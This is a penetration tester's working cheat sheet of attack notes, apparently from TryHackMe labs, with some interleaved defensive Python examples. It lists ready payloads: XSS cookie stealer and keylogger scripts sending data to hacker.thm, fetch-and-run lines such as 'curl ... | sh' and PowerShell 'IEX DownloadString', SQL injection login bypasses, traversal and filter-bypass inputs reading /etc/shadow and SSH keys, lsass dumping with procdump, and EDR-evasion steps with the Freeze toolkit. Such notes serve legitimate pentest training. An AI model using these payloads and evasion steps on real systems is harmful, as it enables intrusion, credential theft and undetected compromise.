TODO: add red team section; clean up notes; add software reverse engineering section; look into Maldev Academy; shell commands; binwalk; Splunk advanced queries; plink - port forwarding attacks.
5 Stages of hacking
- Reconnaissance
- Scanning and enumeration
- Exploitation
- Maintaining access
- Covering tracks
During the pentest of an organization, operators were able to achieve domain admin in 4 hours. Following initial access, the team exploited an outdated machine running Windows 2003 using EternalBlue. On this machine the team identified outdated credentials that granted access to the Git EA code repository. From there, pentest personnel identified hard-coded credentials for multiple services and escalated privileges using those credentials.
Nmap 3.81: the --interactive mode (nmap 3.8) allows a user to run a shell as root using !sh.
Default credentials: Cisco devices - cisco:cisco, admin:admin, root:root; iDRAC - root:calvin
strace, ltrace
Gtfobins
LOLbins
LOL drivers
KDMapper is a simple tool that exploits a vulnerable Intel driver (iqvw64e.sys) to manually map unsigned drivers into memory
static binaries - https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
Armitage
Covenant
Powershell Empire and Starkiller
Sliver
Havoc
Contact Form Testing The most preferred entry point for spammers is often a web application’s contact form. Therefore the contact form you have in your web application should be able to identify and prevent such spam attacks. Including CAPTCHA is one of the easiest ways of preventing contact form spamming.
Proxy Server(s) Testing Proxy servers play a huge role in scrutinizing the traffic to your web application and pointing out any malicious activity. Therefore ensure the proxy servers within your network are functioning accurately and efficiently. Tools like Burp Proxy and OWASP ZAP can go a long way in helping you accomplish this task.
Spam Email Filter Testing Ensure spam email filters are functioning properly. Verify that they are successfully filtering the incoming and outgoing traffic and blocking unsolicited emails. In other words, ensure that email security policies are being enforced properly, because spam emails are a much-preferred mode of attack for hackers.
Network Firewall Testing Make sure your firewall is preventing undesirable traffic from entering into your web application. Also, ensure the security policies configured using the firewall are being implemented properly. A glitch in your firewall is like sending an invitation to hackers to come and hack your web application.
Security Vulnerability Testing Carry out a thorough security check on various aspects associated with your web application like servers and other such network devices and make a list of the security vulnerabilities they pose. Then find and implement ways to fix them.
Credential Encryption Testing Ensure all usernames and passwords are encrypted and transferred over secure “HTTPS” connection so that these credentials are not compromised by hackers through man-in-the-middle or other such attacks. Because just as your web application needs to be secure, so is the sensitive data being submitted by your clients.
Cookie Testing Cookies store data related to user sessions. If this sensitive information is exposed to hackers, the security of many users who visit your website or web application can be compromised. Therefore ensure your cookie data is not exposed, i.e. not available in readable format or as plain text.
Testing For Open Ports Open ports on the web server hosting your web application also present a good opportunity for hackers to exploit your web application's security. Therefore carry out this security check and ensure there are no unnecessary open ports on your web server.
Application Login Page Testing Ensure your web application locks itself up after a specific number of unsuccessful login attempts. This is one of the most basic elements, which, when implemented correctly can go a long way in securing your web application from hackers.
Error Message Testing Ensure all your error messages are generic and do not reveal too much about the problem. If they do, it's like announcing to the hacking community, "we have a problem here, you're welcome to exploit it!" For example, "Invalid Credentials" is fine, but the message should not be as specific as "invalid username" or "invalid password."
HTTP Method(s) Testing Also review the HTTP methods used by your web application to interact with your clients. Ensure the PUT and DELETE methods are not enabled, as leaving them on will allow hackers to easily exploit your web application.
Username and Password Testing Test all the usernames/passwords that are used on your web application. Passwords should be fairly complex and usernames should not be easily guessable. Separate such weak usernames and passwords and alert those users to change them.
File Scanning Ensure all files you upload to your web application or server are scanned before they are uploaded.
goWitness - take screenshots of pages
Dirbuster - GUI directory buster
Steghide - scan pictures for steganography
Infoga - a tool gathering email account information (IP, hostname, country, ...) from different public sources
assetfinder - identify subdomains
PSMAPEXEC -- https://github.com/The-Viper-One/PsMapExec
AMNESIAC -- https://github.com/Leo4j/Amnesiac
ffuf - ffuf -w "wordlist" -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/signup -mr "username already exists" # -w selects the wordlist file; -X specifies the request method; -H adds additional headers to the request; -u specifies the URL we are making the request to; -mr is the text on the page we are looking for to validate that we've found a valid username.
ffuf -w THMfuff:W1,SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/login -fc 200 # W1 is our list of valid usernames and W2 the list of passwords we will try. Multiple wordlists are again specified with the -w argument but separated with a comma. For a positive match, we're using the -fc argument to filter out responses with HTTP status code 200, leaving only those with another status code.
curl 'http://10.10.19.84/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
curl -L https://<10.10.10.10>/linpeas.sh | sh # execute from memory and send output back to the host
sqlmap
wget
gobuster
gobuster dir -u http://10.10.151.33 -w SecLists/Discovery/Web-Content/directory-list-1.0.txt
Searchsploit
Exploits in searchsploit can be found at /usr/share/exploitDB/exploits/
You'll need to test every possible point of entry; these include:
Parameters in the URL Query String
URL File Path
Sometimes HTTP Headers (although unlikely exploitable in practice)
How to test for Stored XSS:
Examples of places where user input is stored and later displayed could be:
Comments on a blog
User profile information
Website listings
DOM Based XSS:
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.
DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "window.location.x" parameters.
When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as eval().
How to test for Blind XSS:
When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.
A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.
Basic poc: <script>alert('XSS');</script>
Session Stealer: <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key Logger: <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
Escape the input tag first so the payload can run properly. You can do this with the following payload: "><script>alert('THM');</script>. The important part of the payload is the "> which closes the value attribute and then closes the input tag.
Escaping the textarea tag (in Level Two) works a little differently from the input one: use the following payload: </textarea><script>alert('THM');</script>
To escape the existing JavaScript command so you're able to run your code, use the following payload: ';alert('THM');// which will execute your code. The ' closes the field specifying the name, then ; signifies the end of the current command, and the // at the end makes anything after it a comment rather than executable code.
When the word script gets removed from your payload, that's because there is a filter that strips out any potentially dangerous words. When a word gets removed from a string like this, try entering the payload <sscriptcript>alert('THM');</sscriptcript>: after the filter strips the inner "script", you'll get an alert popup with the string THM, and then a confirmation message that your payload was successful with a link to the next level.
If the < and > characters get filtered out from our payload, we are prevented from escaping the IMG tag. To get around the filter, we can take advantage of the additional attributes of the IMG tag, such as the onload event. The onload event executes the code of your choosing once the image specified in the src attribute has loaded onto the web page. Change the payload to /images/cat.jpg" onload="alert('THM'); and then view the page source to see how this works.
Popups (<script>alert("Hello World")</script>) - creates a Hello World message popup in a user's browser. Variants: ;alert(4) and ";alert('XSS');//
Writing HTML (document.write) - override the website's HTML to add your own (essentially defacing the entire page).
XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage.
Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - a mini local port scanner (more information on this is covered in the TryHackMe XSS room).
Example URL with a payload injected into a parameter: https://example.com/urlmessages/leavingTAC.php?destination=https://cnn.com%22%3E%3Cscript%3Ealert(4)%3C/script%3E
Below are some common OS files you could use when testing for directory traversal.
/etc/issue - contains a message or system identification to be printed before the login prompt.
/etc/profile - controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived
/proc/version - specifies the version of the Linux kernel
/etc/passwd - lists all registered users that have access to the system
/etc/shadow - contains information about the system's users' passwords
/root/.bash_history - contains the command history for the root user
/var/log/dmessage - contains global system messages, including the messages that are logged during system startup
/var/mail/root - all emails for root user
/root/.ssh/id_rsa - Private SSH keys for a root or any known valid user on the server
/var/log/apache2/access.log - the accessed requests for Apache webserver
C:\boot.ini - contains the boot options for computers with BIOS firmware
Cyberchef - is a Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Crackstation - web hosted tool to crack weak hashes
In PHP, functions such as include, require, include_once and require_once often contribute to vulnerable web applications. LFI vulnerabilities also occur in other languages such as ASP and JSP, or even in Node.js.
Null byte injection is a technique in which a URL-encoded null byte (%00, 0x00 in hex) is appended to user-supplied data to terminate the string. You could think of it as trying to trick the web app into disregarding whatever comes after the null byte.
By adding the null byte at the end of the payload, we tell the include function to ignore anything after it, which may look like:
include("languages/../../../../../etc/passwd%00" . ".php"); which is equivalent to → include("languages/../../../../../etc/passwd");
NOTE: the %00 trick was fixed in PHP 5.3.4 and does not work on 5.3.4 and above. Another option is the current-directory trick: append /. to the end of the filtered keyword.
If we check the warning message in the include(languages/etc/passwd) section, we know that the web application replaces ../ with the empty string. There are a couple of techniques we can use to bypass this. First, we can send the following payload: ....//....//....//....//....//etc/passwd (a single-pass replacement of ../ leaves ../ behind).
If the web application asks for input that has to include a directory, such as http://webapp.thm/index.php?lang=languages/EN.php, then to exploit this we need to include the directory in the payload like so: ?lang=languages/../../../../../etc/passwd.
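The notes above describe a single-pass ../ filter, the %00 truncation trick, and the directory-prefixed payload. The following is an added example (not code from the original notes) that models a "?lang=" include resolved first the way the notes describe, then with normalisation plus containment, so the three tricks can be checked against each version. LANG_DIR and the allowlist are assumed values.

```python
import posixpath

# Assumed base directory of the language files (constructed for this example).
LANG_DIR = "/var/www/app/languages"
# Constructed allowlist: the strongest fix is to never build the path from user input.
ALLOWED_LANGS = {"EN", "FR"}


def naive_strip_dotdot(user_path: str) -> str:
    """The filter the notes describe: a single pass that replaces every '../' with ''.
    '....//' survives it as '../', which is why that payload works."""
    return user_path.replace("../", "")


def resolve_naive(user_path: str, php_pre_534: bool = True) -> str:
    """Path the application ends up including after the naive filter.

    The app appends '.php'; on PHP < 5.3.4 a %00 in the input truncated the
    name at the null byte, so the suffix was discarded (the notes' %00 trick).
    """
    name = naive_strip_dotdot(user_path) + ".php"
    if php_pre_534 and "\x00" in name:
        name = name.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(LANG_DIR, name))


def resolve_hardened(user_path: str):
    """Return the absolute file to include, or None when the request must be refused.

    Nothing is stripped or rewritten: the candidate is normalised as a whole and
    then checked to still sit under LANG_DIR, so '../', 'languages/../../' and
    any NUL byte are all refused by the same two checks. '....//' is simply a
    directory named '....' here, which stays contained and will not exist.
    """
    if "\x00" in user_path or posixpath.isabs(user_path):
        return None
    base = posixpath.normpath(LANG_DIR)
    full = posixpath.normpath(posixpath.join(base, user_path + ".php"))
    if not full.startswith(base + "/"):
        return None
    return full


def resolve_allowlisted(lang: str):
    """Preferred form: look the value up instead of treating it as a path."""
    if lang not in ALLOWED_LANGS:
        return None
    return posixpath.join(LANG_DIR, lang + ".php")
```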
One requirement for RFI is that the allow_url_fopen option needs to be on
Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
Enter a valid input to see how the web server behaves.
Enter invalid inputs, including special characters and common file names.
Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.
Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
Understand the input validation and if there are any filters!
Try to inject a valid entry to read sensitive files.
Sample curl syntax: curl -X POST http://10.10.56.253/challenges/chall1.php -d 'method=GET&file=/etc/flag1/ –output'
../ can be used for path traversal in an SSRF request
&x= is used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string.
Potential SSRF vulnerabilities can be spotted in web applications when:
- a full URL is used in a parameter in the address bar
- a hidden field in a form
- a partial URL such as just the hostname
- or perhaps only the path of the URL
Some of these are easier to exploit than others, and this is where a lot of trial and error will be required to find a working payload.
If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests, such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.
Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.
In a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which serves metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to 169.254.169.254.
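The two paragraphs above list the alternative spellings of 127.0.0.1 and the DNS trick that defeat a string-matching deny list. The following is an added example (not code from the original notes) of the defender-side check: it canonicalises inet_aton-style literals such as "127.1", "0", "2130706433" and "017700000001" before classifying them, and resolves names so that a record pointing at 127.0.0.1 or 169.254.169.254 is caught too. The resolver is injectable so the check can be tested offline; the sample addresses in the test are constructed.

```python
import ipaddress
import socket


def _part_to_int(part: str):
    """Parse one dotted component the way inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if not part:
        return None
    try:
        if part[:2].lower() == "0x":
            return int(part[2:], 16) if len(part) > 2 else None
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None


def parse_legacy_ipv4(text: str):
    """Return an IPv4Address for any inet_aton-style spelling, or None if it is not one.

    Many HTTP clients accept these shorthand forms, so a deny list that only
    matches the literal string "127.0.0.1" is bypassed by "127.1" or "2130706433".
    """
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_to_int(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    if any(v > 0xFF for v in lead):
        return None
    # The last component fills all remaining bytes (e.g. "127.1" -> 127.0.0.1).
    if last >= 1 << (8 * (4 - len(lead))):
        return None
    number = last
    for i, v in enumerate(lead):
        number += v << (8 * (3 - i))
    return ipaddress.IPv4Address(number)


def is_internal_address(ip) -> bool:
    """True for loopback, link-local (incl. 169.254.169.254), private, unspecified or reserved space."""
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def _default_resolver(host: str):
    """Real DNS lookup; returns every address the name resolves to."""
    return [info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)]


def ssrf_target_allowed(host: str, resolver=_default_resolver) -> bool:
    """Decide whether an outbound request to `host` may be made.

    Literals are canonicalised first; names are resolved and every returned
    address is checked, so a subdomain with a record for 127.0.0.1 or
    169.254.169.254 is refused just like the literal would be. Unresolvable
    names are refused rather than guessed at.
    """
    literal = parse_legacy_ipv4(host)
    if literal is None:
        try:
            literal = ipaddress.ip_address(host.strip("[]"))  # IPv6 literals such as [::1]
        except ValueError:
            literal = None
    if literal is not None:
        return not is_internal_address(literal)
    try:
        resolved = resolver(host)
    except (socket.gaierror, OSError):
        return False
    if not resolved:
        return False
    return all(not is_internal_address(ipaddress.ip_address(a)) for a in resolved)
```

This is a deny check only; pairing it with an allowlist of expected destination hosts and re-checking the address actually connected to (DNS answers can change between lookup and connect) is what closes the gap the notes describe.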
We can enter the following into an SQL-backed login field:
' OR 1=1;--
'or 1=1--
test' OR 1=1; -- //
blah' or 1=1-- // unauthenticated login
|| and + // used to concatenate
The ' character closes the string literal (and any brackets) in the SQL query
OR in a SQL statement returns true if either side of it is true. As 1=1 is always true, the whole statement is true. Thus it tells the server that the email is valid, and logs us in as user id 0, which happens to be the administrator account.
The -- sequence is used in SQL to comment out the rest of the line, so any remaining restrictions in the login query no longer apply as they are interpreted as a comment. This is like the # and // comments in Python and JavaScript respectively.
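The login query the notes describe, built two ways, as an added example (not code from the original notes). The in-memory SQLite table and its rows are constructed for the demonstration, with user id 0 as the administrator as in the notes; passwords are stored in clear only to keep the example short.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table: id 0 is the administrator, as in the notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (0, "admin@example.test", "admin-secret"),   # constructed rows
        (1, "alice@example.test", "alice-pass"),
    ])
    return conn


def login_vulnerable(conn, email: str, password: str):
    """String-concatenated query: a quote in the input closes the literal, OR 1=1
    makes the WHERE clause true for every row, and -- comments out the password
    check. The first row returned is id 0, the administrator."""
    sql = f"SELECT id FROM users WHERE email = '{email}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(conn, email: str, password: str):
    """Bound parameters: the input is only ever compared as data and can never
    change the shape of the statement, so the same payload matches no row."""
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    row = conn.execute(sql, (email, password)).fetchone()
    return row[0] if row else None
```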
sqlmap -u gml.sample.org/grad/neubrew/BFileCommentsOutput.jsp?brewer= comment= type=*
shell operators ;, & and && will combine two (or more) system commands and execute them both
Command injection can be detected in two ways: blind or verbose.
For blind injection, the ping and sleep commands are significant payloads to test with. Using ping as an example, the application will hang for x seconds in relation to how many pings you have specified.
Blind injection can also be detected by forcing some output. This can be done by using redirection operators such as >. For example, we can tell the web application to execute a command such as whoami and redirect its output to a file. We can then use a command such as cat to read this newly created file's contents.
The curl command is a great way to test for command injection.
Verbose command injection is when the application gives you feedback or output as to what is happening or being executed. For example, the output of commands such as ping or whoami is directly displayed on the web application.
In PHP, many functions interact with the operating system to execute commands via a shell; these include exec, passthru and system.
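A ping wrapper of the kind the notes describe, shown in its injectable form beside a hardened one, plus the input check a defender would log on; this is an added example, not code from the original notes, and the host values in the test are constructed.

```python
import re
import subprocess

# Shell operators the notes list (; & && |) plus the other common ones.
SHELL_METACHARS = re.compile(r"[;&|`$(){}<>\n]")
# Strict hostname / IPv4-literal shape: labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_command_vulnerable(host: str) -> str:
    """The injectable pattern: user input concatenated into a string that is handed
    to a shell (the PHP exec/system/passthru case). A ';', '&&' or '|' in `host`
    chains a second command; with no visible output, an injected sleep shows up
    as the delay the notes describe."""
    return f"ping -c 1 {host}"


def looks_injected(host: str) -> bool:
    """Detection helper: True if the input carries a shell operator worth alerting on."""
    return SHELL_METACHARS.search(host) is not None


def build_command_hardened(host: str) -> list:
    """Validate the host against the strict pattern and return an argv list.

    Passing a list with shell=False means no shell ever parses the value, and the
    pattern (which forbids a leading '-') keeps it from being read as an option.
    """
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid host")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> str:
    """Run the hardened command and return its output (not exercised by the test)."""
    result = subprocess.run(build_command_hardened(host), shell=False,
                            capture_output=True, text=True, timeout=10)
    return result.stdout
```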
Command injection payload cheat sheet.
Sysinternals - a suite of utilities for managing, diagnosing, troubleshooting, and monitoring Windows environments
Microsoft offers Sysinternals Live, a service that allows you to execute Sysinternals tools directly from the web without downloading them. You can run a tool from Sysinternals Live by typing \\live.sysinternals.com\tools\<toolname> in the Run dialog box (Win+R) or in the Command Prompt.
Process Explorer (procexp.exe): An advanced version of Task Manager that provides detailed information about processes and their dependencies.
Autoruns (autoruns.exe): Shows you what programs are configured to run during system boot-up or login, and the order in which they are launched.
Process Monitor (procmon.exe): A monitoring tool that shows real-time file system, Registry, and process/thread activity.
When using procmon to examine a process, look for vectors available for possible abuse; examples below:
- Process Create
- check for processes spawned without a specific (fully qualified) path, thus allowing an attacker to hijack or proxy code execution.
TCPView (tcpview.exe): Displays all active TCP and UDP endpoints on your system, including the owning process.
BgInfo (bginfo.exe): Automatically displays relevant information about a Windows computer on the desktop's background.
Sysmon (sysmon.exe): Monitors and reports key system activity via the Windows event log, useful for security and forensic analysis.
AccessChk (accesschk.exe): This utility reports the effective permissions for files, registry keys, services, processes, kernel objects, and more.
Disk2vhd (disk2vhd.exe): Creates a Virtual Hard Disk (VHD) version of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines.
PsTools Suite: A set of command-line tools for managing local and remote systems, including pslist, pskill, psexec, and others.
Registry Explorer (regjump.exe): Jump directly to a specific registry key in Regedit.
VMMap (vmmap.exe): Provides a detailed graphical representation of the memory usage of a process.
RAMMap (rammap.exe): An advanced physical memory usage analysis utility.
#LIVING OFF THE LAND WINDOWS ++
Task Scheduler - manipulate scheduled tasks - taskschd.msc
Registry Editor - analyze registry keys - regedit.exe
Active Directory Users and Computers (ADUC) - search and enumerate users and groups
Procdump - can be used to create a dump file of lsass - procdump.exe -ma lsass.exe
Powershell - C:\Windows\System32\WindowsPowershell\v1.0\
PowerView - https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/README.md
Get-HostIP - resolves a hostname to an IP
Check-Write - checks if the current user can write to the specified file
Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit)
Invoke-CopyFile - copies a local file to a remote location, matching MAC properties
Test-Server - tests connectivity to a specified server
Get-UserProperties - returns all properties specified for users, or a set of user:prop names
Get-ComputerProperties - returns all properties specified for computers, or a set of computer:prop names
Get-LastLoggedOn - return the last logged on user for a target host
Get-UserLogonEvents - returns logon events from the event log for a specified host
Get-UserTGTEvents - returns TGT request events for a specified host
Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host
Invoke-SearchFiles - search a local or remote path for files with specific terms in the name
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returns combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-UserHunterThreaded - threaded version of Invoke-UserHunter
Invoke-StealthUserHunter - finds all file servers utilized in user HomeDirectories, and checks the sessions on each file server, hunting for particular users
Invoke-UserProcessHunter - hunts for processes on domain machines running under specific target user accounts
Invoke-ProcessHunter - hunts for processes with a specific name on domain machines
Invoke-UserEventHunter - hunts for user logon events in domain controller event logs
Get-NetDomainTrusts - gets all trusts for the current user's domain
Get-NetDomainTrustsLDAP - gets all trusts for the current user's domain using just LDAP queries. This is less accurate than Get-NetDomainTrusts but allows you to relay all traffic through your primary DC.
Get-NetForestTrusts - gets all trusts for the forest associated with the current user's domain
Invoke-FindUserTrustGroups - enumerates users who are in groups outside of their principal domain
Invoke-FindAllUserTrustGroups - map all domain trusts and enumerate all users who are in groups outside of their principal domain
Invoke-MapDomainTrusts - try to build a relational mapping of all domain trusts
Invoke-MapDomainTrustsLDAP - try to build a relational mapping of all domain trusts using Get-NetDomainTrustsLDAP
Invoke-Netview - a port of @mubix's netview.exe tool using Get-Net* functionality finds all machines on the local domain and runs various enumeration methods on what it finds
Invoke-NetviewThreaded - threaded version of Invoke-NetView
Invoke-UserView - returns parsable session/loggedon user data for a given domain
Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
Invoke-ShareFinderThreaded - threaded version of Invoke-ShareFinder
Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
Invoke-FileFinderThreaded - threaded version of Invoke-FileFinder
Invoke-FindLocalAdminAccess - finds machines on the domain that the current user has local admin access to
Invoke-FindLocalAdminAccessThreaded - threaded version of Invoke-FindLocalAdminAccess
Invoke-UserFieldSearch - searches a user field for a particular term
Invoke-ComputerFieldSearch - searches a computer field for a particular term
Invoke-FindVulnSystems - finds systems likely vulnerable to MS08-067
Invoke-HostEnum - run all available enumeration checks on a single host
Invoke-EnumerateLocalAdmins - enumerates members of the local Administrators groups across all machines in the domain
Invoke-EnumerateLocalAdminsThreaded - threaded version of Invoke-EnumerateLocalAdmins
CTRL+shift+enter - run as admin
#windows enum
net user /domain - pull all domain users
net user - users on the machine
net user <username> - check a user's local group membership
net localgroup <group> - list the members of a local group
net accounts - password policy
hostname - find the host name
Copy a file from... : copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
Identify stored passwords: rundll32.exe keymgr.dll,KRShowKeyMgr
Search: Get-ChildItem C:\ -Recurse -Include "search string"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" - Search for specific lines in system info - windows enumeration
wmic qfe - identify patches - windows enumeration
wmic logicaldisk get caption, description, providername
whoami /groups - group membership
whoami /priv - privileges
route print - arp table
netstat -ano - identify running ports
sc query windefend - identify the status of defender
sc queryex type= service
netsh advfirewall firewall dump or netsh firewall show state - enumerate windows firewall
schtasks /query /fo LIST /v - look for scheduled tasks that are run by a priv user
#windows post exploitation
IEX (New-Object Net.WebClient).DownloadString("http://sample.com") - download and execute a script in memory (use -OutFile <file name> with Invoke-WebRequest to save to disk instead)
C:\windows\system32\inetsrv> findstr /si password - search the IIS directory for files containing "password"
Cleartext passwords - search for them:
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
# Find all those strings in config files:
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" .
In files - these are common files to find them in. They might be base64-encoded, so look out for that:
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
In registry:
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
#use procdump to dump lsass
procdump.exe -ma lsass.exe
Source: https://pentest.coffee/active-directory-lateral-movement-and-post-exploitation-cheat-sheet-3170982a7055
RDP into windows from linux. xfreerdp /u:user /p:password /cert:ignore /v:MACHINE_IP
Registry Keys
Windows Credential Storage: Registry paths like HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets or HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services can hold saved credentials.
AutoLogin Keys: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (entries like DefaultUserName, DefaultPassword).
Legacy Software Keys: Older software might store credentials in various registry paths depending on the application.
AppLocker
Get-AppLockerPolicy -Effective -Xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-AppLockerPolicy -Effective; $a.RuleCollections
AppLocker rules applied to a host can also be read from the local registry at HKLM\Software\Policies\Microsoft\Windows\SrpV2.
Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
You can use Freeze to load and execute your shellcode in a stealthy manner.
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender
DCSync - to fetch secrets, two security permissions are required: "Replicating Directory Changes" (DS-Replication-Get-Changes) and "Replicating Directory Changes All" (DS-Replication-Get-Changes-All).
Obfuscation and Encoding: Common payloads can often be detected by AV software based on their signatures. By obfuscating the payload or encoding it in a way that it is not recognized as malicious until execution, it's possible to evade AV detection.
Packing and Crypting: Packing and crypting the payload can also help to avoid detection. There are various packers and crypters available that can compress or encrypt the executable, making it difficult for AV to analyze.
Living Off the Land (LotL) and LOLBAS: Using built-in system tools and scripts to conduct operations can often bypass AV since these tools are typically trusted by the operating system. This includes using PowerShell, WMI, and other administrative tools that are less likely to be flagged by AV software.
Fileless Attacks: Conducting attacks that do not rely on files and instead execute directly in memory can bypass traditional file scanning by AV solutions.
Polymorphic and Metamorphic Malware: These types of malware change their code as they spread, making it difficult for AVs to recognize them using traditional signature-based detection methods.
Timing-Based Evasion: Some penetration testers find success by timing the execution of their payloads to avoid detection, such as when AV software may be updating or scanning other parts of the system.
Trusted and Signed Binaries: Using binaries that are signed with a trusted certificate can sometimes allow code to execute without being inspected closely by the AV, as the software may trust signed code more than unsigned.
Research and Testing: Continuously researching the latest AV evasion techniques and testing them in a controlled environment to see what works against current AV engines.
Behavioral Evasion: Since EDR systems often use behavioral analysis to detect malicious activity, one approach is to mimic normal user behavior to avoid triggering alerts.
Misconfiguration Exploitation: EDR systems can sometimes be misconfigured. During an authorized test, security professionals may seek to identify and exploit these misconfigurations to bypass the EDR.
Process Injection: Injecting malicious code into legitimate processes can sometimes bypass EDR monitoring, as the process itself is usually trusted.
Process Hollowing: Start a legitimate executable in a suspended state, unmap its image from memory, write the payload in its place, and resume the main thread. The resulting process keeps the trusted image path and parent, so EDRs that key on those attributes may let it run.
